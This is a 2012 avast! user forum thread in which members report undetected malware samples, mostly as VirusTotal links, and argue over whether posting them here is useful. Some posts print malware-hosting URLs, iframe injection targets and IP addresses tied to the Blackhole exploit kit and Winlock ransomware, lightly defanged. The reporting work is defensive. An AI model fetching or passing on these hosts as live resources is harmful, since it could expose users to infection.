https://www.virustotal.com/file/b8a0a684fe02172343272b5e3fa348cd1ed2f25a71194063f7ccf4d62c3d745e/analysis/
Reported to avast!
https://www.virustotal.com/file/ffc086b6577dac19c99f53569dec5a86e0a6f5709d9588c56ca75f499d883a62/analysis/
-
Exploit.Java.Blacole.K
https://www.virustotal.com/file/8699be5447dd8ba5e530dac02310ac34fd6134d955dbf666804ec804bae3a170/analysis/1337404989/
zulu analyser:
http://zulu.zscaler.com/submission/show/087f8e3493fbf9e4e300a6d02750bc98-1337405033
reported to avast!
-
Undetected malware (Trojan?) https://www.virustotal.com/file/4d75f50ec70dbcc69ad1dd43a57c6cac30bfb8b6f36ffc3478b14b3931b206d2/analysis/1337450149/
Have sent to avast lab
-
Hi Mr Wrong,
This is a Smitfraud adware detection,
polonus
-
Virus.MSExcel.Laroux.ja
https://www.virustotal.com/file/2b06021a97d6212aa995cdf4b778a26343272654e5da8ecea15beaf02d1a890e/analysis/
Trojan.Win32.StealthProxy
https://www.virustotal.com/file/717b9352fb16efb5f863f30d1fe7b72af97e7b5a6e68fe2e3de4a32842d8705a/analysis/
Gen:Variant.Strictor.552
https://www.virustotal.com/file/1295dfac3c682f2d12bcf2e8de07bcdca4dd5fd0ed5d04251330922163257525/analysis/
Trojan.Generic.KD.623610
https://www.virustotal.com/file/bc38899ced186b840a903af7d4d413bb2b471d74286d9eda8de8d567364d7012/analysis/
Reported to avast! ;)
-
Undetected malware
https://www.virustotal.com/file/fce7548bb591412569fc091b29784d43790850fd84b248cbd9416fad0b8c3302/analysis/1337537369/
https://www.virustotal.com/file/cbf2700de3655a89f459f26dbe3a4a0114c660edbf2b544ab866832b3c1d5d08/analysis/1337537503/
https://www.virustotal.com/file/484b7de26369566d473675d08b23b17c0ea0556977c0db2d8cd8b3598d05ce9d/analysis/1337537408/
Have sent to avast lab
-
Undetected malware
https://www.virustotal.com/file/fce7548bb591412569fc091b29784d43790850fd84b248cbd9416fad0b8c3302/analysis/1337537369/
https://www.virustotal.com/file/cbf2700de3655a89f459f26dbe3a4a0114c660edbf2b544ab866832b3c1d5d08/analysis/1337537503/
https://www.virustotal.com/file/484b7de26369566d473675d08b23b17c0ea0556977c0db2d8cd8b3598d05ce9d/analysis/1337537408/
Have sent to avast lab
first file......hmmmmm ???
First seen by VirusTotal
2007-06-19 08:44:26 UTC ( 4 year, 11 months ago )
Third file........ hmmmmm ???
First seen by VirusTotal
2010-06-28 15:45:09 UTC ( 1 year, 10 months ago )
-
Third file........ hmmmmm ???
First seen by VirusTotal
2010-06-28 15:45:09 UTC ( 1 year, 10 months ago )
Why?? When the 3rd one is a serious piece of malware, it's Stuxnet ???
-
Trojan.Winlock.5490
https://www.virustotal.com/file/c7e6b8b89089784e62f73d99bd65b3f236613b356c7b0b3b62afb28ab9fdf529/analysis/
TR/Dropper.Gen
https://www.virustotal.com/file/28a503e05cabddab8dd6bcd39f52997124810b8840a40851558eb1f4d5b793a5/analysis/
Trojan.Win32.Jorik.Vobfus.dwml
https://www.virustotal.com/file/dcbb70d9a7aeffc0fb11cdd94fe3cfa24392bc5fb82a2690c01d2da282d7bade/analysis/
Trojan/Downloader.Banload.abdr
https://www.virustotal.com/file/3770bc7120b6ee942df276ffb11b507b3ffc9013b191f69d83324d6055b1374b/analysis/
TR/Crypt.CFI.Gen
https://www.virustotal.com/file/d22d84b72030d398dbe57e736e7f78eba784234e3780f38a8f1e283347cca730/analysis/
Trojan-Banker.Win32.Banz!IK
https://www.virustotal.com/file/4120fc50e0d4b42d5966a8c53de46cb40e16b03d76031de5c600d04c1800ffef/analysis/
TR/PSW.QQpass.bcss
https://www.virustotal.com/file/18f990e42194d52bf4f5c9be033fb1d372be10c4c5711f83292a37bd89f3e860/analysis/
Tool.InstallToolbar.25
https://www.virustotal.com/file/5c507b86b646d60f12d02a5ca6de92fd586985788cd18da38c6e1eb4ece69a1a/analysis/
Trojan-Ransom.Win32.Birele.nfs
https://www.virustotal.com/file/e483257677affbcfd25a303c8f1bf9366c021e232850c6f9f8612132d05e77c0/analysis/
TrojanDownloader:Win32/Scar.D
https://www.virustotal.com/file/3cf1ccfb6b219dcece5e10392f1ea5a8402c74c77ba3786be59627c864b3209d/analysis/
Trojan.Genome-360
https://www.virustotal.com/file/19dde6d47997f7631d27a4ce65fe1bf9521e6c33610974cd368ec57ad091d18d/analysis/
reported to avast! ;)
-
In one of the aforementioned links there is also a redirect to see htXp://minotauranalysis.com/search.aspx?q=0FDEA8A2436EDEE771C77275C574A399
Comodo blocked this. Malware: W32/Zbot.AAN!tr (Hacktool.Win32.Generic) FORTINET flags this...
htxps://www.virustotal.com/file/c6fb5249e1cd4f80aa06735aa03ec18ddc3bac63599db6af77a02af5089db4ae/analysis/
Avast probably will detect this as PUP,
polonus
-
Trojan/Banker.yjy
http://zulu.zscaler.com/submission/show/ba9c46d3a1fa389a90fdae7442e853e6-1337611666
detection missed here: https://www.virustotal.com/file/7d7793b382828ad64fe3b2619dcf4b03/analysis/
Reported to avast!
-
Undetected malware
https://www.virustotal.com/file/ee814d798c6071977a9e51568fb83c0232d44106a96c5b85492e339b0ba50f18/analysis/1337626776/
https://www.virustotal.com/file/e68f23d459e260600e50cef34adbc354841cf492eebb56194141b3f917bbf2f9/analysis/1337627789/
-
Avast does not detect TR/Barys.2666.22, see here: htxp://vscan.urlvoid.com/analysis/ec252a1247da4889b51f6c8dcd6a0503/MjBkZjE=/
But according to this avast detects: htxps://www.virustotal.com/file/7519c433e5fc7fa08af9b616c27ec0770732682068d9150d08358cb7ed4cd8a1/analysis/
reported to virus AT avast dot com,
polonus
-
Hi pol, are they the same malware with different MD5?? I have seen this happening a couple of times in the past.
-
TR/Buzus.GR.172
https://www.virustotal.com/file/d32eec590fb75c4f3e4f0b678a493ee3e0daa59e05f337714c6f613a0e85f68d/analysis/
TR/Ransom.Birele.nfw
https://www.virustotal.com/file/a640c862a2be297f7a05010cdd7543abd424d6b6aa624541864fa12d6edd357d/analysis/
TR/Rogue.7434052
It was detected by older VPS but current VPS produces no detection...scanned at onlinescan.avast.com
HIDDENEXT/Worm.Gen
https://www.virustotal.com/file/95ced819bffda7fbfc45a508c0f9ad6b8c155f509d4345a0b9e49cadcd1e8010/analysis/
Trojan.Win32.UpToDown.AMN!A2
https://www.virustotal.com/file/f7459ea4cc4212628428366a5326014c8f8f8ecb2c200a4eefc2565c994248ef/analysis/
TR/Crypt.XPACK.Gen
https://www.virustotal.com/file/1db95c7a368187f48c5261deedd399b96c4b22331159698e28071522fe5ea478/analysis/
BDS/Bifrose.dtpg
https://www.virustotal.com/file/060a6ed22052d3ea944369e86fd2c265364177f62cda3fb0f4d2b56c9ffa95e1/analysis/
Win32.Infostealer.ga
https://www.virustotal.com/file/75ad57c086b7ee16c7e8038426f4862f52e8c8d2ec4914154083a3f5e5ba2f1b/analysis/1337678401/
Reported to avast!
-
HTML/Infected.WebPage.Gen2
https://www.virustotal.com/file/f05fb0c81f0eefe8916c951b3aa76e3abd492e2ee3bbbdff7a2615d1244a78e3/analysis/
Reported to avast!
-
You can just report them to Avast,stop posting here in order to increase your Posts,for god's sake.
-
I am just posting things that I feel should be posted...Actually I sent over 50 samples to avast today...I didn't post all here..so it's more than what you see I am reporting here :-[
-
In all honesty, posting here (not just for you) achieves nothing, especially when those posting here don't go back and edit their posts as and when they are added to the virus definitions.
Otherwise this is pointless, it achieves nothing.
-
Really?? I thought the virus analysts were looking at this topic...sorry :-[
So can anybody explain to me why and what should actually be reported here? ???
-
Even if they did monitor the topic (which I rather doubt, they have more to do than monitor this topic) the virus analysts can do nothing with reports, they need samples.
So the reports are essentially worthless in terms of getting it added to the definitions. All that is achieved is a report in this topic; when there is no follow-up (modifying the post) when it is added to the database, it is just an unbalanced topic: lots of reports and no reports of addition to the database.
I can't explain why you post here, as I feel it doesn't get it added to the database; that will only come on receipt of the sample and analysis.
-
true indian,
Report a few days after a sample of the actual malware has been sent to virus AT avast dot com.
You should at least extensively check and counter-check and re-check after some time has elapsed.
For instance you report as undetected a downloader that avast has detection for as Win32:Ivelog-D PUP.
The malware that is missed could have been found when run as a riskware toolbar download aka TR/Dldr.Agent.apg.
Now avast team analysts have decided to treat this as a PUP detection.
You miss a detection with URLVoid, but the Networkshield flags it. Avast has protection for it.
You scan a so-called missed detection just before avast detection is being added. Sometimes detection cannot be made
because the malware is no longer active, closed etc. Some malware only survives for a minimal time online (generally 3 1/2 hrs).
As you do not know what the avast detection brew is made up of, do not comment on the contents!
Here I give you an example for which the greens (active) and reds (closed, taken down) are not showing the real-time situation results:
htxp://www.mwis.ru/ (a lot of greens are actually to be interpreted as reds),
polonus
-
Ransomware - Fake Police Alert
https://www.virustotal.com/file/3e3f980ab668ccde6aafee60ce16e3c35cd91e9b59bff20ce1615d5fb362a458/analysis/1337756549/
Submitted to avast! 8)
-
true indian,
Avast already detected a previous version: https://www.virustotal.com/file/d0a5cfec8e80622b3e194b5ee03e93d78c7ef3478bead6a039d213caaaa58523/analysis/
as Win32:Malware-gen. See: htxp://www.threatexpert.com/report.aspx?md5=c4c129fa72b3c0a6364635e33ee3d9b7
Tested your submission with avast Networkshield: URL:Mal detected with webBug get...
So my question is - did you check the url with the microsoft: Trojan:Win32/Weelsof.A against avast Networkshield?
I guess you did not, for we have detection there,
polonus
-
I got the sample from another site called malwares.pl :-[
-
true indian,
There was only an image from an image sharing site on VT, from: http://i.imgur.com
That image is not from malwares.pl!
As we can see from the image url.
The original forwarder was: htxps://www.virustotal.com/user/tommyklab/
and this one: hxtps://www.virustotal.com/user/24tachion/
As these finds for https://www.virustotal.com/file/3e3f980ab668ccde6aafee60ce16e3c35cd91e9b59bff20ce1615d5fb362a458/analysis/
are also landing on the avast desks, detection will be added sooner or later anyway.
This time I think I have to agree with a couple of DavidR's remarks,
polonus
-
TR/Crypt.XPACK.Gen undetected by avast:
https://www.virustotal.com/file/1ac55d11a737f0fee48c8226cd37dca69f79c70fff57deecf49308871b998f75/analysis/1337779565/
Up and alive malware since 2012-05-23 04:50:02
DrWeb's online scan detects: htxp://91.202.244.89/files/cd88e infected with Trojan.Winlock.5600
reported to virus AT avast dot com
polonus
-
true indian,
You shamelessly copied that, so again you are feeding us fud. That image is not from malwares.pl !
polonus
Pol, I didn't say the image is from malwares.pl, I said the sample is from malwares.pl. Yes, the image is from VT comments but the sample is from malwares.pl...I thought you understood my previous post...Please ask me before blindly accusing..You misunderstood my previous statement :-\ ..That's all I want to say.
-
Regardless of this I see no need for an image, it adds nothing to help detections; samples are king, just send the samples, the rest is just wasted time.
-
As I initially misinterpreted that I have changed my initial posting accordingly.
Thanks for that explanation and the link to malwares.pl.
Well I misunderstood that because when users are going to visit the VT results, they can see that image anyway.
So like DavidR says this only takes forum disk space....as the image is available anyway to those that are interested.
For malwares.pl I do not know whether you provided the malware sample there, but that could be.
I think avast will add detection for it anyway within the next day or so,
polonus
-
Hi pol,
I am sorry for troubles...I will put the description from the sample source next time
-
See: http://zulu.zscaler.com/submission/show/910c0046443f9e7f5a794e7e3cada966-1337845129
Given as rogue RealRegistryCleaner here but avast missed it:
https://www.virustotal.com/file/4e09f3f888c58f152d9da643075a2f29/analysis/
I also added the associated URLs hosting these nasties in the e-mail so they can apply analysis and block down these sites with network shield ;)
Reported to avast!
-
true indian,
This software is bordering on being suspicious/malicious. They try to prove their software comes without malware: htxp://www.softwaredownloads.org/windows/system-utilities/system-maintenance/virus-report/system-boost-elite/
When it is being flagged it is via WOT rep reports, because it comes with additional adware.
This rather should be reported then to MBAM and SAS etc. to be added to detection there,
see: http://v.virscan.org/Adware.Win32.RealRegistryCleaner.AMN!A2.html
polonus
-
I am uploading this sample to MBAM now ;D
-
See:
https://www.virustotal.com/url/0d67512199f0b583d8db822a6e349eaab317505ecc5c64e7dd769a68cf927296/analysis/
Given as rogue but detection missed:
https://www.virustotal.com/file/64fa80d1b2d0f36655f79a70bf0b06ed66acd888f64b75c1b542a03a0df27567/analysis/1337519916/
Reported to avast!
-
PowerBackupandRestoreSetup Rogue as given here:
https://www.virustotal.com/file/0eb6c55cf33e5eb5df9421668e053492/analysis/
See: http://zulu.zscaler.com/submission/show/86fe042ecff6fb676437e9aea6199675-1337848118
Detection missed!
reported to avast! with the link to sites hosting malware ;)
Uploading sample to MBAM now ;D
-
Hi true indian,
Again a questionable one as I will explain below.
Given as non-malicious here: htxp://www.isthisfilesafe.com/md5/0EB6C55CF33E5EB5DF9421668E053492_details.aspx
Maybe a detection was flagged because the program is protected against reverse engineering with modern-wizard.bmp, which some scanners
will flag as a possible malware packer, but actually comes virus-free, and because of the presence of "checkver104.exe"
& ioSpecial.ini / silent installer also sometimes flagged, depending on the location of it.
Scanning htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe with DrWeb's online check turns up these results,
on some occasions commented by me at the end of the scan lines....
Engine version: 7.0.2.4281
Total virus-finding records: 2874792
File size: 962.25 KB
File MD5: 0eb6c55cf33e5eb5df9421668e053492
htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe - archive NSIS (NSIS packer identified by Fprot packer identifier)
>htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe/script.bin - Ok
>htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe/_=9A=80\ioSpecial.ini - Ok
>htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe/_=9A=80\modern-wizard.bmp - Ok
>htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe/AutoBackup.exe - Ok
>htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe/Backup.dll - Ok
>htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe/FileBackup.dll - Ok
>htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe/FolderTree.dll - Ok (validity should be checked)
>htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe/IrisSkin2.dll - Ok (Sunisoft - safe)
>htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe/LogViewer.exe - Ok (- Module'
>htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe/PowerBackupandRestore.exe - Ok
>htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe/SimpleSync.dll - Ok (location should be verified)
>htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe/CheckVer104.exe - archive BINARYRES
>>htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe/CheckVer104.exe/data001 - Ok
>>htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe/CheckVer104.exe/data002 - archive JS-HTML
>>>htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe/CheckVer104.exe/data002/JSTAG_1[9][8c] - Ok
>>htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe/CheckVer104.exe/data002 - Ok
>htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe/CheckVer104.exe - Ok
>htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe/_=9A=80\iOClean.ini - Ok / silent installer, could evoke Sandbox alert
>htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe/_=9A=80\InstallOptions.dll - Ok
>htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe/_=9A=80\ExecDos.dll - Ok
>hxtp://www.applicationbox.info/PowerBackupandRestoreSetup.exe/_=9A=80\System.dll - Ok
htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe - Ok
Typical executable flagged by Emsisoft, malware active since 2012-05-18 08:10:59 - other instances from other domains closed.
Analysis see:
http://camas.comodo.com/cgi-bin/submit?file=9a0dd7a6e08b7476fde0dc774b72d0e8cd780883bd53a2747c078eab6ef0e4c7
a variant of Win32/Agent.SZW
Bitdefender flagged this variant of Win32/Agent.SZW as TROJ_LOWZONE.BMC (backdoor)
polonus
-
That does seem an interesting one pol...I will surely upload this sample to Comodo Valkyrie and check if we have anything to be detected :)
Thanks for the reports and analysis ;)
-
Hi true indian,
What I mean to say is it is interesting, as all file analysis for malcode is in my view, but i.m.o. this detection does not qualify to be added to avast detection.
Emsisoft's and others' detection is based on a false interpretation of resource engineering protection and packer evaluation. The analysis that flags it is just not good enough to give the right interpretation, and the malware and backdoor status is location dependent. All seems right there. At the end of the day it might well be this is a false positive, but leave the final verdict to avast analysts.
I for one would qualify it as a PUP detection, not more, see -
htxp://anubis.iseclab.org/?action=result&task_id=185ec922d48bb01141d5963d0c58bd1d9&format=html
polonus
-
New undetected:
hxtp://urlquery.net/report.php?id=59292
but found malicious
htxp://zulu.zscaler.com/submission/show/5b124e86cc043c9d5a27951ccda33296-1337885769
hxtps://www.virustotal.com/url/e74c423163a1c2a577817added8452bf77f3907a65cff6bb726a44d594da3d6b/analysis/1337885933/
file scan gave: https://www.virustotal.com/file/ee093983a238538765e23737bdd82e8296fa895f27dbc532150accee74534c8b/analysis/1337885946/
a generic dropper detection for a variant of MSIL/Injector.ACV
reported to virus AT avast dot com,
polonus
-
See: htxps://www.virustotal.com/url/d957ed47e8e37a165ea08052eda3d435e86c62ffadcc7fc44d4d595f45cc9c3e/analysis/
and
htxps://www.virustotal.com/file/ee51df51d91daa155caf8b167d6966e65c3587347a207380b5449e1582f200f7/analysis/
polonus
-
Rogue - Windows Safety Maintenance
https://www.virustotal.com/file/b388e80f7a73523a0861115a6d59070627e237ef0dc3c94373ab267776c7c55f/analysis/
reported to avast! ;)
EDIT: Detection added
-
FakePoliceAlert Ransomware
https://www.virustotal.com/file/d95312a777a941af73fe9c14821664423bd83893f75775ce49789a09dd1942af/analysis/1338031561/
submitted to avast! ;)
-
Undetected malware:
https://www.virustotal.com/file/f87ded45828c004fb47bb3da57bffb1378b00c9d1953c5d09c04c4ea767f6eaa/analysis/1337968556/
https://www.virustotal.com/file/1a0d99cbf36ac600d250ee653e72a8adef3bc685c3990821b1c3dde850e521c2/analysis/1337968740/
https://www.virustotal.com/file/f92bda7141b962e1eee36d2d54dd22a03ea27c0dee6924eeba96baedea85961c/analysis/1338039267/
-
Even from the VT link I can reconstruct the original malware site for that detection. Let me guess, it was this one htxp://zulu.zscaler.com/submission/show/8fe6f00a94e39973e4c97060f369deef-1338076028
accompanying VT scan: htxps://www.virustotal.com/file/f92bda7141b962e1eee36d2d54dd22a03ea27c0dee6924eeba96baedea85961c/analysis/
somewhat earlier than yours. But as you give an identifiable hash together with a searchable file-name I could do the reconstruction via
htxp://minotauranalysis.com/search.aspx?q=4d2ea30db117d9689f3d4718bbe44ebc
and what I can do others can do. It does not need rocket science to do this reconstruction to find the non-detection URL!
So I agree with and lean more and more towards DavidR's point of view to first send a sample and VT results
to virus At avast dot com, and try to be restrictive with info here, until detection has been added,
polonus
-
found by Chabbo.... on Fake scan site
jotti
http://virusscan.jotti.org/en/scanresult/a2976e42d5d70b9d725f3c634aaa310f1bdad145
detected by Malwarebytes as Trojan.Dropper
uploaded to avast and SAS ;)
-
Java/Exploit.CVE-2012-0507.AP
https://www.virustotal.com/file/89c110e01a7c7769f4acace2007e48f5549d0dee757598e68570338911306f72/analysis/
reported to avast! ;)
-
Java/Exploit.CVE-2012-0507.AP as reported by true indian is known to be a malicious backdoor Trojan, which runs without user knowledge and allows remote access to a PC for cyber criminals. This malware uses various files that exploit Java vulnerabilities. When it infects your system, hackers might get access to personal information like passwords or files.
Trojan.Maljava has the ability to block some programs from running, to make you think that your PC is at high risk. Every file of it is considered to be malicious, so if you find any - remove it as soon as possible under the guidance of a qualified removal expert.
On Vista & Win 7 malcode files can be found as:
%AllUsersProfile%\~[random]
%AllUsersProfile%\~[random]r
%AllUsersProfile%\[random].dll
%AllUsersProfile%\[random].exe
%AllUsersProfile%\[random]
%AllUsersProfile%\[random].exe
%UserProfile%\Desktop\Trojan.maljava.lnk
%UserProfile%\Start Menu\Programs\Trojan.maljava\Uninstall Trojan.maljava.lnk
%UserProfile%\Start Menu\Programs\Trojan.maljava\Trojan.maljava.lnk
To be protected, always make sure you have the latest Java version installed if you have Java installed, so you are not vulnerable; check: http://www.java.com/nl/download/installed.jsp
polonus
-
TR/Spy.Banker.Gen
https://www.virustotal.com/file/976e238360bc2febba432ce968705731743518879567caeaa144f15624c01a27/analysis/
Trojan-Banker.Win32.Bancos.uga
https://www.virustotal.com/file/928fb059c5569fd369b99aa20034119384422bf927a3c10a7e8e1306afa7a090/analysis/
reported to avast! ;)
-
Worm.Win32.Flame.a
https://www.virustotal.com/file/029bcd72dc2ca4b31778cf4ee086038d8bd6c59ed2ed485e247aed56f909f881/analysis/
TR/Flame.A.8
https://www.virustotal.com/file/1999c26614de76068d9431b8184e933c63b5813b76a95fac6cc4b47e93832c23/analysis/
reported to avast! and uploaded to MBAM 8)
PM me if you want samples for Flame ;)
EDIT: detections added
-
TR/Spy.ZBot.aav
https://www.virustotal.com/file/40bd4160bb37ccf944799129463933a61f32bbb306a2dac3f95a9d3cb19598f5/analysis/
reported to avast! :)
Edit: detection added
-
Windows Antivirus Rampart - FakeVimes
https://www.virustotal.com/file/4d0a1e0213904a7d397d51e38c4aaed26f8824984e9ca162505ea22a9ffae15c/analysis/
reported to avast! ;)
EDIT: detection added
-
Windows Malware Firewall - new FakeVimes rogue
https://www.virustotal.com/file/b4d5db39daf38597453fb3acb9c403976fea86508b599e506d144ac42206d70b/analysis/
reported to avast!
edit: detection added
-
Missed JS/Exploit-Blacole.cx / fake LinkedIn spam leading to this malware via CVE-2011-3521 vuln, see: htxps://www.virustotal.com/file/d3af335637df9a1b29b9ed5e1cc0db6e60f313039ec758bfccfe0acebfb1e8d8/analysis/
see: htxp://zulu.zscaler.com/submission/show/e99c8ecf9c2b888f079a9ef0655ee90e-1338581545
IP address: 187.85.160.106, 184.106.200.65, 50.57.88.200, 50.57.43.49
Also found here that there was LinkedIn spam
So the payload is also here:
The payload is on immerialtv dot ru:8080/forum/showthread.php?page=5fa58bce769e5c2c hosted on the following IPs:
50.57.43.49 (Slicehost, US)
50.57.88.200 (Slicehost, US)
184.106.200.65 (Slicehost, US)
187.85.160.106 (Ksys Soluções Web, Brazil) See this address for our find
all this reported to virus AT avast dot com
polonus
-
Another one here, Trojan:JS/BlacoleRef.W missed: htxp://zulu.zscaler.com/submission/show/f58b27f17b497ce2c367cb12a7694ff5-1338582640
see VT results -> htxps://www.virustotal.com/file/38addb00e677ec62da4d04da6344107aeaa00ba204ab3f02d9806d3e0284e85d/analysis/
see: htxp://urlquery.net/report.php?id=62312 mdl_Leads to exploit kit detected 2012-06-01 13:22:00 live malware,
which avast should normally detect as HTML:RedirME-inf [Trj]
Detected BlackHole exploit kit HTTP GET request
- Detected malicious injected iframe -> iframe src='htxp://mazdaforumi.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c
(the one we reported in the previous posting)
We see this is an ongoing problem through a malware campaign (5 hrs ago, 6 hrs ago) when we search for: htxp://www.google.nl/search?sugexp=chrome,mod=9&ix=h9&sourceid=chrome&ie=UTF-8&q=iframe+src%3D'http%3A%2F%2Fmazdaforumi.ru%3A8080%2Fforum%2Fshowthread.php%3Fpage%3D5fa58bce769e5c2c
reported to virus AT avast dot com,
polonus
-
Another Trojan:JS/BlacoleRef.W, not detected, htxps://www.virustotal.com/file/07ca7776a566cc872c2fd0602da135072e780a10b062175e00c2710f3f63a365/analysis/
from: htxp://zulu.zscaler.com/submission/show/af5d670395a65113f12e98337f95bb64-1338587387
see: htxp://urlquery.net/queued.php?id=62630
- Detected BlackHole exploit kit HTTP GET request
- Detected malicious injected iframe
reported to virus AT avast dot com
-
Hi Polonus,
Not a new exploit method given in your post regarding "wire-transfer.htm".
I've seen the exact algorithm somewhere else.
-
Hi !Donovan,
Well then they are running a new campaign with this again. So old wine in new sacks, so to say. Thanks for your evaluation.
I just report what I see happening while scanning, and when I cannot get an avast detection, I immediately report back to the avast base,
well analysts. I think you are developing a very good "feel" for the various varieties of malcoded scripts out there,
as it is inspiring for both of us,
polonus
-
Hi malware reporters ;D
Trojan-FakeAV.Win32.Agent.rkx
https://www.virustotal.com/file/e1aaa0a98fc43f47d0d5777429631eaa4f8449bdbdbc268fb03d48fc910df8a3/analysis/
trojan winlock
https://www.virustotal.com/file/36ad11081c1b29b3540b918337478740921ddec0a90c45aabc0cc367f34e6763/analysis/
reported to avast! ;)
EDIT: detections added
-
From the latest VT Comments:
Weelsolf BotNet (9-40)
https://www.virustotal.com/file/f25296744471f5f29718832998c20ac15bb968f426ae2259b5bdcb57a249d47f/analysis/
Rogue AV Live Security Platinum (8-42)
https://www.virustotal.com/file/cca6e3ecef865d2a5623c2e3b04a27d96c10abc90c5e67a3b5477d7ba215c438/analysis/
-
Hi Friends,
found by makcunknown
trojan ransom.
https://www.virustotal.com/file/d5faa80f5c8c083d37bc276f5dfe1598599fa07f67e8c9d55bbf8c41caa5bb62/analysis/
reported to avast!
EDIT: detection added
-
undetected malware
https://www.virustotal.com/file/b11c2b9b1dff86529ae399eb2bb2181e8edf720c722029a9000f6a7adad7248d/analysis/1338741938/
-
reported to virus AT avast dot com: https://www.virustotal.com/file/524b01eeee5d8c40918f552a1eb3543c37a3a773af9505070ecab24ccc7b31a7/analysis/
polonus
-
No AV Detect..yet.
https://www.virustotal.com/file/2a8d08b52bad72da37b15e56a0f8bfb41bee1188c15808e7e5a0a2b0a5ccec35/analysis/
See comment from mwsniffer
-
See: htxp://vscan.urlvoid.com/analysis/e88bca0faa4901001e23d338727d9327/aW5kZXg=/
See: htxp://sitecheck.sucuri.net/results/www.wandelhalle-hamburg.de
reported to virus AT avast dot com,
polonus
-
Trojan.Mayachok.17105, detected only by Dr.Web
https://www.virustotal.com/file/1091ad4f18ada3c85bd69ac724e32f31585fc1a15a432a21e92d03087066777b/analysis/1338983553/
-
Hacktool or backdoor not detected by avast: htxp://zulu.zscaler.com/submission/show/61e0aaa070b0a7ac40098af1a3a433f0-1338986102
and VT results: htxps://www.virustotal.com/file/80725340b7830288dfe4969eb070a542516a040efc2c1e6473b6051d086f46ab/analysis/
reported to virus AT avast dot com,
polonus
-
https://www.virustotal.com/file/b918547ded8f978ba5bfc2f1dd48cd2bf620635d18c869b1a3c513dd8efa2edf/analysis/1338986572/
-
TR/Flame.A.7
https://www.virustotal.com/file/0a96ba671bebc78e705ae2d2360bf49a3f34f46a7522555eec47b31d90069c71/analysis/
reported to avast! 8)
Edit: detection added
-
Mal/FBJack-A
detection missed...contains obfuscated Iframe..new Facebook HTML malware/spam..redirects to faked Jason Bieber video
https://www.virustotal.com/file/57726a46a0debac32dec0a06d1fa9df2b79566f2f8a2ef8754a66775e86f939c/analysis/1339141426/
reported to avast!
-
Malware sent yesterday to avast but still no detection ?
https://www.virustotal.com/file/06f2dde9b6e726480e52f02fc3af75278fedc1270764b10dbbfb349a9876b23b/analysis/1339248959/
-
Hi MDRockstar,
This is because the suspicious file ltastd.exe is flagged as riskware. It might be opened by avast to be run first in the sandbox for evaluation,
polonus
-
Not many of the larger AVs are detecting it either. Many that are are using heuristics and are calling it PUP or riskware.
-
Hi DavidR,
Thank you for confirming the PUP status. The poster probably sent it because of this report: http://systemexplorer.net/db/ltastd.exe.html
polonus
-
Detected by Dr.Web as Trojan.SMSSend.2917.
https://www.virustotal.com/file/551d2509a5d4769e1212c47116300795f0dc8708fe50ce43683d14c0fe8d3dff/analysis/1339428024/
-
This topic shall be closed, samples can be sent directly to AvastLab. If you want to increase your post count, think of something smarter. No offense but it's the truth.
-
undetected malware
https://www.virustotal.com/file/8a79715f3e63650f8897a24ffe8b0301f447958b303ecd45ab00ac883ecbaf4f/analysis/1342451827/
-
Was cleaning a computer infected with win8 security system and found that avast does not detect this rootkit that comes bundled along with this rogue.
https://www.virustotal.com/file/3945861e049199662423a539e96b0c49a904501e9aef02faa4da678633cbcc37/analysis/
Reported to avast!
-
Hi true indian,
Subject had already been mentioned extensively in an earlier thread here: http://forum.avast.com/index.php?topic=104668.0
Why did you not react there?
polonus
-
Somebody posted this on our avast! FB wall..
https://www.virustotal.com/file/da5e7057fd1bd488c5e9ff8fede941f00d32d58bae8f3ca4b5b8096189d4768f/analysis/1347769210/
Reported to avast!
-
see the sigcheck and first seen by VT
-
Sigcheck
publisher................: Oracle Corporation
product..................: Oracle VM VirtualBox
internal name............: VirtualBox.exe
copyright................: Copyright (C) 2009-2011 Oracle Corporation
original name............: VirtualBox.exe
file version.............: 4.0.4.70112
description..............: Oracle VM VirtualBox Manager
First seen by VirusTotal
2012-09-11 08:39:32 UTC ( 1 minute ago )
I had checked for a digital signature earlier when I downloaded it..and it didn't have one, so I guess this is 100% Malware.
P.S. I like the name given by SAS on VT: Heur.Agent/Gen-FakeAvast ....interesting.. ;D
-
you may run it at threatexpert to see what it does
-
I don't think it really does anything much...I couldn't get into my ThreatExpert account because I forgot my username and password.
http://anubis.iseclab.org/?action=result&task_id=12633cb1584a7e084498422305d2e74d6&format=html
-
Hi true indian,
Can you confirm you also posted this here: http://forums.malwarebytes.org/index.php?showtopic=115632
polonus
-
yes that was me who posted this there...
Avast! now has detection... ;D
-
Again some piece of Malware on avast! FB wall..
https://www.virustotal.com/file/13fdec273e3240acbc1ea323a2c4a4c0c64cd6d9da04107b51315a0d28ccc2d4/analysis/
it [rar file] extracts a hidden text file called significant.txt which contains BKDR/symmi
Reported to avast!
-
Trojan-Ransom.Win32.Gpcode.dm
https://www.virustotal.com/file/c0603fcd04d8e2fe78559a1fc07d0d8e569c08225ecb864850edd9511b11a439/analysis/1347881864/
sent to avast! ;)
edit: latest streaming update detects this now after sending.
-
Microsoft IE 0 Day
https://www.virustotal.com/file/75bd9b405fd0239644ab0c6aae6579096a407ddedd3c6139219f8c8e8f5b2db3/analysis/
reported to avast! 8)
-
Again some malware posted on avast facebook wall...
https://www.virustotal.com/file/c25a1c46aa91763bf657fe0d8d89ef7ce6ffa3502a68e7b1bcbbfa36da210600/analysis/
reported to avast!
-
